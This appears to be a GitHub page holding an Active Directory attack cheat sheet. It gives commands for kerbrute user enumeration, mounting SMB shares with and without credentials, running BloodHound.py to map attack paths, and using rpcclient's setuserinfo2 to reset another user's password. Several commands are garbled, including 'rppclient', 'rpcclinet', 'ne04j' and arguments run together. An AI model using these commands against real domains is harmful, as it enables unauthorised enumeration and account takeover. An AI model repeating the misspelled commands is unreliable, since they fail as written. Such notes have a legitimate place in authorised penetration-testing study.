You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# enumerate AD users with kerbrute
kerbrute userenum --dc 10.10.*.* -d domain users.txt
Mount
# mount an anonymous login share
mount -t cifs '//10.10.*.*/ShareName' /mOuNt_Location
# mount an authenticated smb share
mount -t cifs -o 'username=UserName,password=Password''//10.10.*.*/ShareName' /mOuNt_Location
BloodHound
On Windows
# setup
git clone https://github.com/fox-it/BloodHound.py;cd BloodHound.py; python3 setup.py install
# Running bloodhound.py
python3 bloodhound.py -u userName -p 'PASSWORD' -ns machineIP -d domain.local -c all
# start the neo4j console
sudo ne04j console
# start the bloodhoundcd /opt/bloodhound-linux-x64/
./BloodHound
# import all the json files# mark the obtained user as owned user and the target user as high value target
Reset AD users passowrd with rppclient
# login to rpcclinet
rppclient -U userName machineIP
# password for the user we have access to
rpcclinet $> setuserinfo2 {userToChange} 23 '{PasswordToChange}'# enumerates users which mostly will be AD Users
rpcclinet $> enumdomusers
# enumerate printers in the machine
rpcclinet $> enumprinters